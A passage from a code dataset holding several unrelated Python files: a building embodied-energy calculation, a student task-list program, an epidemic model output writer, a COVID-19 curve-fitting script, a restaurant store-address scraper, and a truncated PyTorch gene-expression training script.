/ SERVICE_LIFE_OF_BUILDINGS +\n ((HVAC_df['floor_area_ag'] + HVAC_df['footprint']) * HVAC_df[\n 'Services']) / SERVICE_LIFE_OF_TECHNICAL_SYSTEMS) * built_df['confirm']\n \n # calculate the embodied energy/emissions due to retrofits\n # if a component was retrofitted more than 60 years before, its contribution has been \"paid off\" and is set to 0\n ## contributions due to envelope retrofit\n envelope_df['delta_year'] = year_to_calculate - envelope_df['envelope']\n envelope_df['confirm'] = envelope_df.apply(lambda x: calc_if_existing(x['delta_year'], SERVICE_LIFE_OF_BUILDINGS), axis=1)\n envelope_df['contrib'] = (envelope_df['Wall_ext_ag'] * envelope_df['area_walls_ext_ag']) * envelope_df[\n 'confirm'] / (SERVICE_LIFE_OF_BUILDINGS)\n ## contributions due to roof retrofit\n roof_df['delta_year'] = year_to_calculate - roof_df['roof']\n roof_df['confirm'] = roof_df.apply(lambda x: calc_if_existing(x['delta_year'], SERVICE_LIFE_OF_BUILDINGS), axis=1)\n roof_df['contrib'] = roof_df['Roof'] * roof_df['footprint'] * roof_df['confirm'] / SERVICE_LIFE_OF_BUILDINGS\n ## contributions due to windows retrofit\n windows_df['delta_year'] = year_to_calculate - windows_df['windows']\n windows_df['confirm'] = windows_df.apply(lambda x: calc_if_existing(x['delta_year'], SERVICE_LIFE_OF_BUILDINGS), axis=1)\n windows_df['contrib'] = windows_df['windows_ag'] * windows_df['Win_ext'] * windows_df[\n 'confirm'] / SERVICE_LIFE_OF_BUILDINGS\n ## contributions due to partitions retrofit\n partitions_df['delta_year'] = year_to_calculate - partitions_df['partitions']\n partitions_df['confirm'] = partitions_df.apply(lambda x: calc_if_existing(x['delta_year'], SERVICE_LIFE_OF_BUILDINGS),\n axis=1)\n partitions_df['contrib'] = (partitions_df['floor_area_ag'] * partitions_df['Floor_int'] +\n partitions_df['floor_area_ag'] * partitions_df['Wall_int_sup'] * CONVERSION_AREA_TO_FLOOR_AREA_RATIO +\n partitions_df['footprint'] * partitions_df['Wall_int_nosup'] * CONVERSION_AREA_TO_FLOOR_AREA_RATIO) * \\\n partitions_df['confirm'] / SERVICE_LIFE_OF_BUILDINGS\n ## contributions due to basement_df\n basement_df['delta_year'] = year_to_calculate - basement_df['basement']\n basement_df['confirm'] = basement_df.apply(lambda x: calc_if_existing(x['delta_year'], SERVICE_LIFE_OF_BUILDINGS), axis=1)\n basement_df['contrib'] = ((basement_df['footprint'] * basement_df['Floor_g'] +\n basement_df['Wall_ext_bg'] * basement_df['area_walls_ext_bg'])\n * basement_df['confirm'] / SERVICE_LIFE_OF_BUILDINGS)\n ## contributions due to HVAC_df\n HVAC_df['delta_year'] = year_to_calculate - HVAC_df['HVAC']\n HVAC_df['confirm'] = HVAC_df.apply(lambda x: calc_if_existing(x['delta_year'], SERVICE_LIFE_OF_TECHNICAL_SYSTEMS), axis=1)\n HVAC_df['contrib'] = ((HVAC_df['floor_area_ag'] + HVAC_df['footprint']) * HVAC_df['Services']) * HVAC_df[\n 'confirm'] / SERVICE_LIFE_OF_TECHNICAL_SYSTEMS\n\n # the total embodied energy/emissions are calculated as a sum of the contributions from construction and retrofits\n built_df[total_column] = (HVAC_df['contrib'] + basement_df['contrib'] + partitions_df['contrib']\n + built_df['contrib'] + roof_df['contrib'] + envelope_df['contrib']\n + windows_df['contrib']) / 1000\n built_df[specific_column] = built_df[total_column] * 1000 / built_df['total_area']\n\n # the total and specific embodied energy/emissions are returned \n result = built_df[['Name', total_column, specific_column, 'total_area']]\n\n return result\n\ndef calc_if_existing(x, y):\n \"\"\"\n Function to verify if one value is greater than or equal to another (then return 1) or not (return 0). This is used\n to verify whether a building's construction or retrofits happened more than 60 years before the year to calculate.\n Since the embodied energy and emissions are calculated over 60 years, if the year of calculation is more than 60 \n years after construction, the results will be 0.\n \n :param x: Number of years since construction/retrofit\n :type x: long\n :param y: Number of years over which the embodied energy/emissions calculation is carried out (i.e., 60)\n :type y: int\n\n :return value: 1 if x <= y; 0 otherwise\n :rtype value: int\n\n \"\"\"\n\n if x <= y:\n return 1\n else:\n return 0\n\ndef calc_code(code1, code2, code3, code4):\n return str(code1) + str(code2) + str(code3) + str(code4)\n\n\ndef main(config):\n assert os.path.exists(config.scenario), 'Scenario not found: %s' % config.scenario\n locator = cea.inputlocator.InputLocator(scenario=config.scenario)\n\n print('Running embodied-energy with scenario = %s' % config.scenario)\n print('Running embodied-energy with year-to-calculate = %s' % config.emissions.year_to_calculate)\n\n lca_embodied(locator=locator, year_to_calculate=config.emissions.year_to_calculate, config=config,\n gv=cea.globalvar.GlobalVariables())\n\n\nif __name__ == '__main__':\n main(cea.config.Configuration())\n","sub_path":"cea/analysis/lca/embodied.py","file_name":"embodied.py","file_ext":"py","file_size_in_byte":17371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"521863211","text":"# Create a task list. A user is presented with the text below.\n#Congratulations! You're running [YOUR NAME]'s Task List program.\n\n# What would you like to do next?\n# 1. List all tasks.\n# 2. Add a task to the list.\n# 3. Delete a task.\n# 0. To quit the program\n\n# Let them select an option to list all of their tasks, add a task to their list, delete a task, or quit the program.\n# Make each option a different function in your program.\n# Do NOT use Google. Do NOT use other students. Try to do this on your own.\n #Extra Credit. Save the user's list in a text file. When the program is run again,\n# input that text file so their task list is not lost.\n\n\n\ntaskList=[\"sweep the floor\",\"clean the bathroom\",\"do the laundry\",\"cut the grass\"]\n\ndef listAlltasksfunc():\n for i in taskList:\n print(i)\ndef addToList(newtask):\n taskList.append(newtask) # add newtask to tasklist\ndef deleteTask(taskTodelete):\n taskList.remove(taskTodelete) # remove instead of pop\n\n\nmenu = -1\nwhile menu != 4:\n menu = int(input('What would you like to do next \\n'\n '1. List all tasks \\n'\n '2. Add a task to the list \\n'\n '3. Delete a task. \\n'\n '4. To quit the program'))\n if menu == 1:\n print('The task List is:')\n listAlltasksfunc()\n\n if menu == 2:\n taskNew= input('Add to the task list here: ')\n f = open(\"file.txt\",\"a\") # opens file > file name> a for append\n f.write(taskNew) # writes file\n f.close()\n addToList(taskNew) # adds to task to original list\n if menu == 3:\n removeTask=input('what task would you like to delete ? ')\n deleteTask(removeTask)","sub_path":"Dekevion.py","file_name":"Dekevion.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"467545104","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/runner/runners/2.169.1/work/MetaWards/MetaWards/tests/../build/lib.macosx-10.14-x86_64-3.7/metawards/extractors/_output_trajectory.py\n# Compiled at: 2020-05-11 13:26:49\n# Size of source mod 2**32: 1569 bytes\nfrom typing import Union as _Union\nfrom .._network import Network\nfrom .._networks import Networks\nfrom .._population import Populations\nfrom .._outputfiles import OutputFiles\n__all__ = [\n 'output_trajectory']\n\ndef output_trajectory(network: _Union[(Network, Networks)], output_dir: OutputFiles, trajectory: Populations, **kwargs) -> None:\n \"\"\"Call in the \"finalise\" stage to output the\n population trajectory to the 'trajectory.csv' file\n \"\"\"\n RESULTS = output_dir.open('trajectory.csv')\n has_date = trajectory[0].date\n if has_date:\n datestring = 'date,'\n else:\n datestring = ''\n RESULTS.write(f\"day,{datestring}demographic,S,E,I,R,IW\\n\")\n for i, pop in enumerate(trajectory):\n if pop.date:\n d = pop.date.isoformat() + ','\n else:\n d = ''\n RESULTS.write(f\"{pop.day},{d}overall,{pop.susceptibles},{pop.latent},{pop.total},{pop.recovereds},{pop.n_inf_wards}\\n\")\n if isinstance(network, Networks):\n for i, demographic in enumerate(network.demographics):\n subpop = pop.subpops[i]\n name = demographic.name\n if not name is None:\n if len(name) == 0:\n name = str(i)\n RESULTS.write(f\"{subpop.day},{d}{name},{subpop.susceptibles},{subpop.latent},{subpop.total},{subpop.recovereds},{subpop.n_inf_wards}\\n\")","sub_path":"pycfiles/metawards-0.11.2-cp37-cp37m-macosx_10_14_x86_64/_output_trajectory.cpython-37.py","file_name":"_output_trajectory.cpython-37.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"346392261","text":"#include package\nimport numpy as np\nfrom scipy.integrate import odeint\nfrom scipy.optimize import minimize\nimport matplotlib.pyplot as plt\n\nimport pandas as pd\n\n#pandasでCSVデータ読む。\ndata = pd.read_csv('COVID-19/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv')\ndata_r = pd.read_csv('COVID-19/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_recovered_global.csv')\ndata_d = pd.read_csv('COVID-19/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv')\n\n \nconfirmed = [0] * (len(data.columns) - 4)\nday_confirmed = [0] * (len(data.columns) - 4)\nconfirmed_r = [0] * (len(data_r.columns) - 4)\nday_confirmed_r = [0] * (len(data.columns) - 4)\nconfirmed_d = [0] * (len(data_d.columns) - 4)\ndiff_confirmed = [0] * (len(data.columns) - 4)\ndays_from_22_Jan_20 = np.arange(0, len(data.columns) - 4, 1)\ndays_from_22_Jan_20_ = np.arange(0, len(data.columns) - 4, 1)\nbeta_ = [0] * (len(data_r.columns) - 4)\ngamma_ = [0] * (len(data_d.columns) - 4)\n\n\ncity = \"Japan\"\n#city =\"world\"\n#city = \"Germany\"\n#city = \"Italy\"\n#city = \"Spain\"\n#city = \"United Kingdom\"\n#city =\"US\"\n#city = \"Iran\"\n#city = \"Switzerland\"\n#city =\"Sweden\"\n#city = \"France\"\n#city = \"Hong Kong\"\n#city = \"Beijing\"\n#city = \"Taiwan*\"\n#city = \"Hubei\"\ncity = \"Korea, South\"\ncity = \"India\"\n\nskd=5 #2 #1 #4 #3 #2 #slopes average factor\n#データを加工する\nt_cases = 0\nt_recover = 0\nt_deaths = 0\nfor i in range(0, len(data_r), 1):\n if (data_r.iloc[i][1] == city): #for country/region\n #if (data_r.iloc[i][0] == city): #for province:/state \n print(str(data_r.iloc[i][0]) + \" of \" + data_r.iloc[i][1])\n for day in range(4, len(data.columns), 1): \n confirmed_r[day - 4] += data_r.iloc[i][day]\n if day < 4+skd:\n day_confirmed_r[day-4] += data_r.iloc[i][day]\n else:\n day_confirmed_r[day-4] += (data_r.iloc[i][day] - data_r.iloc[i][day-skd])/(skd)\n t_recover += data_r.iloc[i][day] \nfor i in range(0, len(data_d), 1):\n if (data_d.iloc[i][1] == city): #for country/region\n #if (data_d.iloc[i][0] == city): #for province:/state \n print(str(data_d.iloc[i][0]) + \" of \" + data_d.iloc[i][1])\n for day in range(4, len(data.columns), 1):\n confirmed_d[day - 4] += data_d.iloc[i][day] #fro drawings\n t_deaths += data_d.iloc[i][day] \nfor i in range(0, len(data), 1):\n if (data.iloc[i][1] == city): #for country/region\n #if (data.iloc[i][0] == city): #for province:/state \n print(str(data.iloc[i][0]) + \" of \" + data.iloc[i][1])\n for day in range(4, len(data.columns), 1):\n confirmed[day - 4] += data.iloc[i][day] - confirmed_r[day - 4] -confirmed_d[day-4]\n diff_confirmed[day - 4] += confirmed[day-4] / (confirmed_r[day - 4]+confirmed_d[day-4])\n if day == 4:\n day_confirmed[day-4] += data.iloc[i][day]\n else:\n day_confirmed[day-4] += data.iloc[i][day] - data.iloc[i][day-1]\n\ntl_confirmed = 0\ndlog_confirmed = [0] * (len(data.columns) - 4)\ndlog_confirmed[0]=np.log(confirmed[0])\ndlog_confirmed[1]=np.log(confirmed[1])-np.log(confirmed[0])\nratio_confirmed = [0] * (len(data.columns) - 4)\nratio_confirmed[0]=np.log(confirmed[0])\nratio_confirmed[1]=(confirmed[1]-confirmed[0]) #/(confirmed[0])\nratio_confirmed[2]=(confirmed[2]-confirmed[0])/2 #/(confirmed[0])/2\n\nfor i in range(skd, len(confirmed), 1): \n if confirmed[i] > 0: \n gamma_[i]=day_confirmed_r[i]/confirmed[i]\n else:\n continue\ntl_confirmed = confirmed[len(confirmed)-1] + confirmed_r[len(confirmed)-1] + confirmed_d[len(confirmed)-1]\nt_cases = tl_confirmed\n\nt_max=len(confirmed)\ndt=1\nt=np.arange(0,t_max,dt)\nt1=t\n\nobs_i = confirmed_r\n#function which estimate i from seir model func \ndef estimate_i(ini_state,r0,a):\n est = r0*np.exp(a*t+0*t)\n return est\n\ndef y(params):\n est_i=estimate_i(ini_state,params[0],params[1])\n return np.sum((est_i-obs_i)*(est_i-obs_i))\n\ndef estimate_j(ini_state,r0,alpha):\n est = r0+alpha*(t)\n return est\n\ndef yj(params):\n est_i=estimate_j(ini_state,params[0],params[1])\n return np.sum((est_i-obs_i)*(est_i-obs_i))\n\nr0=1\na = 1\n\nini_state=[4.34379478e+03, 3.64147576e-02]\n#optimize logscale likelihood function\nmnmz=minimize(y,ini_state,method=\"nelder-mead\")\nprint(mnmz)\nr0,a = mnmz.x[0],mnmz.x[1] #,mnmz.x[2]\nest=estimate_i(ini_state,r0,a)\n\nt=np.arange(63,t_max,dt)\nt2=t\nobs_i = confirmed[63:]\nr0_=1\nalpha_ = 1\nini_state=[5.70579672, 0.00755685]\n#optimize logscale likelihood function\nmnmz=minimize(y,ini_state,method=\"nelder-mead\")\nprint(mnmz)\nr0_,alpha_ = mnmz.x[0],mnmz.x[1]\n#est_confirmed=estimate_i(ini_state,r0_,alpha_)\n#t=np.arange(63,100,dt)\nt3=t\nest_confirmed=estimate_i(ini_state,r0_,alpha_)\n\ndiff_est=[0] * (len(data.columns) - 4)\ngamma_est=[0] * (len(data.columns) - 4)\nR_est = [0] * (len(data_d.columns) - 4)\nR_0 = [0] * (len(data_d.columns) - 4)\nC = [0] * (len(data_d.columns) - 4)\nfor i in range(1,t_max):\n diff_est[i]=est[i]-est[i-1]\nfor i in range(0, len(confirmed), 1): \n if confirmed[i] > 0 and diff_est[i] > 0: \n gamma_est[i]=diff_est[i]/confirmed[i]\n R_est[i]= 1+day_confirmed[i]/diff_est[i] # diff_est=gamma*confirmed\n #R_0[i]= R_est[i]/(1-gamma_est[i]*R_est[i]*confirmed[i]*i/t_cases)\n C[i]=gamma_est[i]*(R_est[i]-1)\n else:\n continue\n\n#matplotlib描画\nfig, (ax1,ax2) = plt.subplots(2,1,figsize=(1.6180 * 4, 4*2))\n#ax3 = ax1.twinx()\nax4 = ax2.twinx()\n\nlns1=ax1.semilogy(days_from_22_Jan_20, confirmed, \"o-\", color=\"red\",label = \"cases\")\nlns8=ax1.semilogy(t3, est_confirmed, \"-\", color=\"black\",label = \"cases_r0_={:.2f}alpha_={:.2e}\".format(r0_,alpha_))\nlns2=ax1.semilogy(days_from_22_Jan_20, confirmed_r, \"*-\", color=\"green\",label = \"recovered+deaths\")\n#lns4=ax2.plot(days_from_22_Jan_20_, dlog_confirmed, \"o-\", color=\"blue\",label = \"dlog_confirmed\")\n#lns3=ax4.plot(days_from_22_Jan_20_, gamma_, \"o-\", color=\"black\", zorder=1,label = \"gamma\")\nlns3=ax4.plot(days_from_22_Jan_20_, gamma_est, \"o-\", color=\"black\", zorder=1,label = \"gamma_est\")\n#lns4=ax2.bar(days_from_22_Jan_20_, day_confirmed, zorder=2, label = \"day_confirmed\")\nlns4=ax2.plot(days_from_22_Jan_20_, R_est, \"o-\", color=\"blue\",label = \"R_est\")\nlns5=ax1.semilogy(days_from_22_Jan_20_, diff_confirmed, \".-\", color=\"black\",label = \"I/(R+D)\")\nlns6=ax1.semilogy(t1, est,\"-\", color=\"black\", zorder=1, label = \"est_r0={:.2f}alpha={:.2e}\".format(r0,a))\nlns7=ax2.plot(t1, diff_est,\"-\", color=\"black\", zorder=1, label = \"diff_est_r0={:.2f}alpha={:.2e}\".format(r0,a))\nlns9=ax2.bar(days_from_22_Jan_20_, day_confirmed_r, label = \"day_confirmed_r\")\n#lns10=ax2.plot(days_from_22_Jan_20_, R_0, \"o-\", color=\"red\",label = \"R_0\")\nlns4=ax2.plot(days_from_22_Jan_20_, C, \"o-\", color=\"red\",label = \"gamma*(R-1)\")\n\nlns_ax1 = lns1 +lns2 +lns5 + lns6 +lns8\nlabs_ax1 = [l.get_label() for l in lns_ax1]\nax1.legend(lns_ax1, labs_ax1, loc=0)\n\nlns_ax2 = lns3 #+lns9\nlabs_ax2 = [l.get_label() for l in lns_ax2]\nax4.legend(lns_ax2, labs_ax2, loc=0)\nax2.legend(loc=2)\n\nax1.set_title(city +\" ; {} cases, {} recovered, {} deaths\".format(t_cases,t_recover,t_deaths))\nax1.set_xlabel(\"days from 22, Jan, 2020\")\nax1.set_ylabel(\"casas, recovered \")\n#ax2.set_ylabel(\"dlog_confirmed\")\nax4.set_ylabel(\"gamma\")\nax2.set_ylabel(\"day_confirmed_r, R\")\nax4.set_ylim(0,0.04)\n#ax2.set_ylim(0,40)\nax2.set_yscale('log')\n#ax4.set_yscale('log')\n\n#ax3.set_ylabel(\"deaths \")\n#ax4.set_ylabel(\"deaths_rate %\")\n#ax4.set_ylim(-0.5,0.5)\nax1.grid()\nax2.grid()\n\nplt.pause(1)\n#city = \"Tiwan\"\nplt.savefig('./fig/removed_{}_gamma_R_{}.png'.format(city,skd)) \nplt.close() \n\nt=np.arange(63,t_max,dt)\nt4=t\nobs_i = C[63:]\nr0_=1\nalpha_ = 1\nini_state=[1, 1]\n#optimize logscale likelihood function\nmnmz=minimize(yj,ini_state,method=\"nelder-mead\")\nprint(mnmz)\nr0_,alpha_ = mnmz.x[0],mnmz.x[1]\n#t4=t\nest_C = estimate_j(ini_state,r0_,alpha_)\n\nt=np.arange(63,100,dt)\nt4=t\nest_C=estimate_j(ini_state,r0_,alpha_)\n\n#matplotlib描画\nfig, ax4 = plt.subplots(1,1,figsize=(1.6180 * 4, 4*1))\n\nlns10=ax4.plot(days_from_22_Jan_20_, C, \"o-\", color=\"blue\",label = \"gamma*(R-1)\")\nlns11=ax4.plot(t4, est_C, \".-\", color=\"black\",label = \"est_gamma*(R-1)\")\nax4.legend(loc=2)\n\nax4.set_title(city +\" ; {} cases, {} recovered, {} deaths\".format(t_cases,t_recover,t_deaths))\nax4.set_xlabel(\"days from 22, Jan, 2020\")\nax4.set_ylabel(\"gamma*(R-1) \")\nax4.set_ylim(0,0.4)\n\nax4.grid()\n\nplt.pause(1)\nplt.savefig('./fig/removed_{}_gammaR_{}.png'.format(city,skd)) \nplt.close() \n\nt=np.arange(63,t_max,dt)\nt2=t\nobs_i = confirmed[63:]\nr0_=1\nalpha_ = 1\nini_state=[5.70579672, 0.00755685]\n#optimize logscale likelihood function\nmnmz=minimize(y,ini_state,method=\"nelder-mead\")\nprint(mnmz)\nr0_,alpha_ = mnmz.x[0],mnmz.x[1]\n#est_confirmed=estimate_i(ini_state,r0_,alpha_)\n#t=np.arange(63,100,dt)\nt3=t\nest_confirmed=estimate_i(ini_state,r0_,alpha_)\n\nt=np.arange(63,100,dt)\nt3=t\nest_confirmed=estimate_i(ini_state,r0_,alpha_)\n\n#matplotlib描画\nfig, ax3 = plt.subplots(1,1,figsize=(1.6180 * 4, 4*1))\n\nlns1=ax3.semilogy(days_from_22_Jan_20, confirmed, \"o-\", color=\"red\",label = \"cases\")\nlns8=ax3.semilogy(t3, est_confirmed, \"-\", color=\"black\",label = \"cases_r0_={:.2f}alpha_={:.2e}\".format(r0_,alpha_))\nlns2=ax3.semilogy(days_from_22_Jan_20, confirmed_r, \"*-\", color=\"green\",label = \"recovered+deaths\")\nlns5=ax3.semilogy(days_from_22_Jan_20_, diff_confirmed, \".-\", color=\"black\",label = \"I/(R+D)\")\nlns6=ax3.semilogy(t1, est,\"-\", color=\"black\", zorder=1, label = \"est_r0={:.2f}alpha={:.2e}\".format(r0,a))\n\nlns_ax1 = lns1 +lns2 +lns5 + lns6 +lns8\nlabs_ax1 = [l.get_label() for l in lns_ax1]\nax3.legend(lns_ax1, labs_ax1, loc=0)\n\nax3.set_title(city +\" ; {} cases, {} recovered, {} deaths\".format(t_cases,t_recover,t_deaths))\nax3.set_xlabel(\"days from 22, Jan, 2020\")\nax3.set_ylabel(\"casas, recovered \")\nax3.grid()\n\nplt.pause(1)\nplt.savefig('./fig/exterpolate_{}_gamma_R_{}.png'.format(city,skd)) \nplt.close() \n\n","sub_path":"fitting_gamma_R.py","file_name":"fitting_gamma_R.py","file_ext":"py","file_size_in_byte":9949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"54067799","text":"import pandas as pd\r\nimport urllib.request\r\nimport datetime\r\nimport json\r\nfrom bs4 import BeautifulSoup\r\nfrom itertools import count\r\n\r\nresult = []\r\nmyColumns = ('store', 'sido', 'gungu','address')\r\nmyencoding = 'utf-8'\r\n\r\ndef get_request_url(url):\r\n req = urllib.request.Request(url)\r\n\r\n try:\r\n response = urllib.request.urlopen(req)\r\n if response.getcode() == 200:\r\n print (\"[%s] Url Request Success\" % datetime.datetime.now())\r\n return response.read().decode('utf-8')\r\n except Exception as e:\r\n return None\r\n\r\ndef getKyochonAddress():\r\n for sido1 in range(1,18):\r\n for sido2 in count():\r\n url = 'http://www.kyochon.com/shop/domestic.asp'\r\n url += '?txt_search='\r\n url += '&sido1=%s' %str(sido1)\r\n url += '&sido2=%s' %str(sido2 +1)\r\n\r\n mydata = get_request_url(url)\r\n if(mydata == None):\r\n break\r\n soup = BeautifulSoup(mydata, 'html.parser')\r\n ultag = soup.find('ul', attrs={'class':'list'})\r\n\r\n for myitem in ultag.findAll('a', href=True):\r\n store = myitem.find('dt').get_text()\r\n address = myitem.find('dd').get_text()\r\n address = address.strip().split('\\r')[0]\r\n\r\n imsi = address.split(' ')\r\n sido = imsi[0]\r\n gungu = imsi[1]\r\n\r\n sublist = []\r\n sublist.append(store)\r\n sublist.append(sido)\r\n sublist.append(gungu)\r\n sublist.append(address)\r\n\r\n result.append(sublist)\r\n\r\nprint('kyochon 매장 크롤링 시작')\r\ngetKyochonAddress()\r\ndata = pd.DataFrame(result, columns = myColumns)\r\ndata.to_csv('kyochon.csv', encoding = myencoding, mode = 'w', index=True )\r\nprint('kyochon 매장 크롤링 종료')\r\n","sub_path":"crawling/kyochon_scraping.py","file_name":"kyochon_scraping.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"358986235","text":"import argparse\nimport time\n\nimport numpy as np\nimport sys\nimport torch\nimport torch.utils.data\nimport torch.nn as nn\n\nimport torch.optim as optim\n\nsys.path.append('/home/lvfengmao/wanggang/GeneInference/CoNet/')\n\nfrom utils.load_data import MyDataSet\nfrom model.CoNet_3000 import CoNet_3000\nfrom model.CoNet_6000_3000 import CoNet_6000_3000\nfrom model.CoNet_6000_4000_2000 import CoNet_6000_4000_2000\n'''\n1、定义超参数\n'''\n# 采用的网络模型\nMODEL = 'CoNet_6000_3000'\n# 训练批次数\nNUM_EPOCH = 200\n# batch的大小\nBATCH_SIZE = 5000\n# 输入维度大小\nIN_SIZE = 943\n# 输出维度大小\nOUT_SIZE = 9520\n'''AE'''\nHIDDEN_D1_SIZE = 6000\nHIDDEN_D2_SIZE = 3000\nHIDDEN_D3_SIZE = 1000\nD_SIZE = 1000\n# dropout\nDROPOUT_RATE_AE = 0.1\n# 学习率\nLEARNING_RATE_LR = 5e-4\nLEARNING_RATE_AE = 5e-4\n\ndef get_arguments():\n \"\"\"\n Parse all the arguments provided from the CLI.\n\n Returns:\n A list of parsed arguments.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"dense idea's arguments\")\n parser.add_argument(\"--model\", type=str, default=MODEL,\n help=\"the network structure that you want use,CoNet_3000? or CoNet_6000_3000 and so on\")\n parser.add_argument(\"--num-epoch\", type=int, default=NUM_EPOCH,\n help=\"iter numbers\")\n parser.add_argument(\"--batch-size\", type=int, default=BATCH_SIZE,\n help=\"batch's size\")\n parser.add_argument(\"--hidden-d1-size\", type=int, default=HIDDEN_D1_SIZE,\n help=\"AE's first hidden layer's size\")\n parser.add_argument(\"--hidden-d2-size\", type=int, default=HIDDEN_D2_SIZE,\n help=\"AE's second hidden layer's size\")\n parser.add_argument(\"--hidden-d3-size\", type=int, default=HIDDEN_D3_SIZE,\n help=\"AE's third hidden layer's size\")\n parser.add_argument(\"--d-size\", type=int, default=D_SIZE,\n help=\"AE's middle layer's size\")\n parser.add_argument(\"--dropout-rate-ae\", type=float, default=DROPOUT_RATE_AE,\n help=\"dropout rate, 0.1,0.25?\")\n parser.add_argument(\"--learning-rate-lr\", type=float, default=LEARNING_RATE_LR,\n help=\"learning rate of LR, 5e-4?\")\n parser.add_argument(\"--learning-rate-ae\", type=float, default=LEARNING_RATE_AE,\n help=\"learning rate of AE, 5e-4?\")\n return parser.parse_args()\n\nargs = get_arguments()\n\n\ndef main():\n '''\n 2、读取数据\n '''\n print('loading data...:'+args.dataset)\n\n tr_set = MyDataSet(x_path='../dataset/bgedv2_X_tr_float64.npy', y_path='../dataset/bgedv2_Y_tr_float64.npy')\n tr_loader = torch.utils.data.DataLoader(tr_set, batch_size=args.batch_size, shuffle=True)\n\n X_va = torch.from_numpy(np.array(np.load('../dataset/bgedv2_X_va_float64.npy'))).type(torch.FloatTensor).cuda()\n Y_va = torch.from_numpy(np.array(np.load('../dataset/bgedv2_Y_va_float64.npy'))).type(torch.FloatTensor).cuda()\n\n X_te = torch.from_numpy(np.array(np.load('../dataset/bgedv2_X_te_float64.npy'))).type(torch.FloatTensor).cuda()\n Y_te = torch.from_numpy(np.array(np.load('../dataset/bgedv2_Y_te_float64.npy'))).type(torch.FloatTensor).cuda()\n\n X_1000G = torch.from_numpy(np.array(np.load('./dataset/1000G_X_float64.npy'))).type(torch.FloatTensor).cuda()\n Y_1000G = torch.from_numpy(np.array(np.load('./dataset/1000G_Y_float64.npy'))).type(torch.FloatTensor).cuda()\n\n X_GTEx = torch.from_numpy(np.array(np.load('../dataset/GTEx_X_float64.npy'))).type(torch.FloatTensor).cuda()\n Y_GTEx = torch.from_numpy(np.array(np.load('../dataset/GTEx_Y_float64.npy'))).type(torch.FloatTensor).cuda()\n\n '''\n 2、定义网络\n '''\n net = globals()[args.model](IN_SIZE, OUT_SIZE, args.d_size, args.hidden_d1_size, args.hidden_d2_size,\n args.hidden_d3_size, args.dropout_rate_ae).cuda()\n net = nn.DataParallel(net, device_ids=[0])\n '''\n 3、定义Loss和优化器\n '''\n\n criterion = nn.MSELoss(reduce=True, size_average=False)\n net_optimizer = optim.Adam([\n {'params': net.module.fcnet.parameters(), 'lr': args.learning_rate_lr},\n {'params': net.module.encoder.parameters()},\n {'params': net.module.decoder.parameters()}\n ], lr=args.learning_rate_ae)\n '''\n 4、开始训练网络\n '''\n\n MAE_te_best = 10.0\n MAE_GTEx_best = 10.0\n net_parameters_GEO = {}\n net_parameters_GTEx = {}\n\n outlog = open('../../res/CoNet/'+args.model+'.log', 'w')\n log_str = '\\t'.join(map(str, ['epoch', 'MAE_va', 'MAE_te','MAE_1000G', 'MAE_GTEx', 'MAE_tr', 'time(sec)']))\n print(log_str)\n outlog.write(log_str + '\\n')\n sys.stdout.flush()\n\n for epoch in range(args.num_epoch):\n for i, data in enumerate(tr_loader, 0):\n t_old = time.time()\n '''\n 开始训练了\n '''\n # forward\n net.train()\n x_batch, y_batch = data\n x_batch = x_batch.type(torch.FloatTensor).cuda()\n y_batch = y_batch.type(torch.FloatTensor).cuda()\n\n y_fc,y_ae = net.module(x_batch, y_batch)\n\n y_fc_loss = criterion(y_fc, y_batch)\n y_ae_loss = criterion(y_ae, y_batch)\n all_loss = y_fc_loss + y_ae_loss\n # backward\n net_optimizer.zero_grad()\n all_loss.backward()\n net_optimizer.step()\n\n torch.cuda.empty_cache()\n\n '''\n 开始验证了\n '''\n with torch.no_grad():\n net.eval()\n #计算output\n va_outputs, _ = net.module(X_va, Y_va)\n te_outputs, _ = net.module(X_te, Y_te)\n l000G_outputs, _ = net.module(X_1000G, Y_1000G)\n GTEx_outputs, _ = net.module(X_GTEx, Y_GTEx)\n\n #计算MAE\n MAE_tr = np.abs(y_batch.detach().cpu().numpy() - y_fc.detach().cpu().numpy()).mean()\n MAE_va = np.abs(Y_va.detach().cpu().numpy() - va_outputs.detach().cpu().numpy()).mean()\n MAE_te = np.abs(Y_te.detach().cpu().numpy() - te_outputs.detach().cpu().numpy()).mean()\n MAE_1000G = np.abs(Y_1000G.detach().cpu().numpy() - l000G_outputs.detach().cpu().numpy()).mean()\n MAE_GTEx = np.abs(Y_GTEx.detach().cpu().numpy() - GTEx_outputs.detach().cpu().numpy()).mean()\n\n\n t_new = time.time()\n log_str = '\\t'.join(\n map(str, [(epoch * np.ceil(88807/args.batch_size)) + i + 1, '%.6f' % MAE_va, '%.6f' % MAE_te,\n '%.6f' % MAE_1000G, '%.6f' % MAE_GTEx,\n '%.6f' % MAE_tr, int(t_new - t_old)]))\n print(log_str)\n outlog.write(log_str + '\\n')\n sys.stdout.flush()\n # 保留最优MAE_te\n if MAE_te < MAE_te_best:\n MAE_te_best = MAE_te\n net_parameters_GEO = net.state_dict()\n if MAE_GTEx < MAE_GTEx_best:\n MAE_GTEx_best = MAE_GTEx\n net_parameters_GTEx = net.state_dict()\n print(\"epoch %d training over\" % epoch)\n # 保存训练出来的模型\n torch.save(net_parameters_GEO, '../../res/CoNet/' + args.model + '_GEO.pt')\n torch.save(net_parameters_GTEx, '../../res/dense/' + args.model + '_GTEx.pt')\n print('MAE_te_best : %.6f' % (MAE_te_best))\n print('MAE_GTEx_best : %.6f' % (MAE_GTEx_best))\n outlog.write('MAE_te_best : %.6f' % (MAE_te_best) + '\\n')\n outlog.write('MAE_GTEx_best 